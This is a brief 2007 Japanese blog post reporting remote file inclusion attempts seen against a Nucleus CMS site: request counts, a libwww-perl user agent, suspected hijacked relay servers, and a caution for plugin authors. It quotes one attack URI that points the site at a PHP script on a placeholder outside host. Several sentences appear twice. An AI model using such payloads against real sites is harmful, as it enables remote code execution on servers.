ファイルインクルードを狙ったクラック
2007年8月7日
最近、Nucleusに対するこの手のアクセスが多い。例えば、今日 16:49:08 GMT から 19:08:14 GMT までの間に、17回の不正アクセスが4つのIPアドレスからあった。手口からすると、IP詐称でさまざまなアドレスからアクセスしてくるのでは無いらしい。Uset-Agent は、『libwww-perl/x.xx』で、PERL用のライブラリ。x.xxの部分はバージョンで、5.65 から、 5.808 までさまざまである。アクセスしてくる4つのアドレスは、バックドアを仕掛けられた4つのサーバに相当していて、クラッカーはこれらの乗っ取ったサーバを経由してアタックしてきているのではないかと思われる。
具体的なURIとしては、例えば
インクルードしようとするスクリプトはPHPで書かれているが、これについては、にっき - ほしにねがいをに、ある程度まとめられている。
今のところNucleusでの被害は起こりそうに無いけれど、プラグイン製作の際は当然ながらファイルインクルード系の命令には注意が必要だ。
具体的なURIとしては、例えば
/index.php?body=http://xxx.xxx.com/larry123/safe.txt?こんな感じ。
インクルードしようとするスクリプトはPHPで書かれているが、これについては、にっき - ほしにねがいをに、ある程度まとめられている。
今のところNucleusでの被害は起こりそうに無いけれど、プラグイン製作の際は当然ながらファイルインクルード系の命令には注意が必要だ。